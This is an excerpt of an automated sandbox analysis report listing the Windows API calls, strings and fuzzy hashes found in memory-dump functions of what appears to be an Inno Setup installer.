                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                                                                                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                                                                                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                                                                                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2280970139-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GlobalHandle.KERNEL32 ref: 00406287
                                                                                                                                                                                                                                                                                                                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 0040628E
                                                                                                                                                                                                                                                                                                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                                                                                                                                                                                                                                                                                                  • GlobalFix.KERNEL32(00000000), ref: 00406299
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Global$AllocHandleWire
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2210401237-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B8D5,?,00000000,00000000,00000001,00000000,0047A301,?,00000000), ref: 0047A2C5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to parse "reg" constant, xrefs: 0047A2CC
                                                                                                                                                                                                                                                                                                                                                                  • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A139
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-1938159461
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                                                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(?), ref: 0045C7FD
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • NumRecs range exceeded, xrefs: 0045C6FA
                                                                                                                                                                                                                                                                                                                                                                  • EndOffset range exceeded, xrefs: 0045C731
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$BuffersFlush
                                                                                                                                                                                                                                                                                                                                                                  • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3593489403-659731555
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483045
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483057
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Will not restart Windows automatically., xrefs: 00483176
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ActiveForeground
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Will not restart Windows automatically.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 307657957-4169339592
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CFE0
                                                                                                                                                                                                                                                                                                                                                                  • Failed to proceed to next wizard page; aborting., xrefs: 0046CFCC
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1974262853
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00478E9A,?,?,00000001,00000000,00000000,00478EB5), ref: 00478E83
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478E0E
                                                                                                                                                                                                                                                                                                                                                                  • %s\%s_is1, xrefs: 00478E2C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-1598650737
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A56
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A5F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1375471231-2986845003
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501E9
                                                                                                                                                                                                                                                                                                                                                                  • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045021A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ExecuteMessageSendShell
                                                                                                                                                                                                                                                                                                                                                                  • String ID: open
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 812272486-2758837156
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 00455318
• GetLastError.KERNEL32(0000003C,00000000,00455361,?,?,00000001,00000001), ref: 00455329
  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: DirectoryErrorExecuteLastShellSystem
• String ID: <
• API String ID: 893404051-4251816714
• Opcode ID: 94ae09d0a25fb1738ecc061ea662f04067247507c52871123d701916d6d8ec01
• Instruction ID: ea799879bbb6ab716a70283d096866571a468ac1fa4b8cc73728b10af3e72d10
• Opcode Fuzzy Hash: 94ae09d0a25fb1738ecc061ea662f04067247507c52871123d701916d6d8ec01
• Instruction Fuzzy Hash: 02215370A00609ABDB10DFA5D8926AE7BF8AF18355F50443AFC44E7281D7789949CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
• RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$AllocInitializeLocal
• String ID: )
• API String ID: 2227675388-1084416617
• Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
• Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
• Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
• Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496539
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Window
• String ID: /INITPROCWND=$%x $@
• API String ID: 2353593579-4169826103
• Opcode ID: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
• Instruction ID: 8ac61a852f64af84e8a4d996ffe215da0ea6a1f7c0dd4c2642a2787a2d41e8fe
• Opcode Fuzzy Hash: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
• Instruction Fuzzy Hash: C711A531A043089FDB01DF64E855BAE7BE8EB48324F52847BE404E7281DB3CE905CA58
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• SysFreeString.OLEAUT32(?), ref: 004474D6
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: String$AllocByteCharFreeMultiWide
                                                                                                                                                                                                                                                                                                                                                                  • String ID: NIL Interface Exception$Unknown Method
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3952431833-1023667238
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
                                                                                                                                                                                                                                                                                                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Value$EnumQuery
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Inno Setup: No Icons
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1576479698-2016326496
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressDirectoryErrorLibraryLoadModeProcSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2552568031-1506664499
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004555D0: GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004555D0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                                                                                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00497266
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497291
                                                                                                                                                                                                                                                                                                                                                                  • Restarting Windows., xrefs: 00497243
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3179053593-4147564754
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f042dff5c045186d33be5417afa4f05d679b9763972d2bb00463d131ea403ed4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD01D8706282406BEB00EB65E981B9C3F99AB5430CF5040BBF900A72D3D73C9945871D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C596,00000000,0047C5AC,?,?,?,?,00000000), ref: 0047C372
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                                                                                  • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-1113070880
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 634078ff0e474af831ce18fa40e897e48b4e4349eb04070b88f5601e6398850b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cd6b81515cbcb541a42d20c803a6709c30f964b406f28b15d8fe69fce277d2ff
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 634078ff0e474af831ce18fa40e897e48b4e4349eb04070b88f5601e6398850b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41F09030704204ABEB00D669ECD2BAA33A99746304F60C03FA9088B392D6799E01CB5C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047CD84: FreeLibrary.KERNEL32(00000000,004814B7), ref: 0047CD9A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047CA54: GetTickCount.KERNEL32 ref: 0047CA9E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004570CC: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570EB
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049832B), ref: 00497A29
                                                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049832B), ref: 00497A2F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Detected restart. Removing temporary directory., xrefs: 004979E3
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
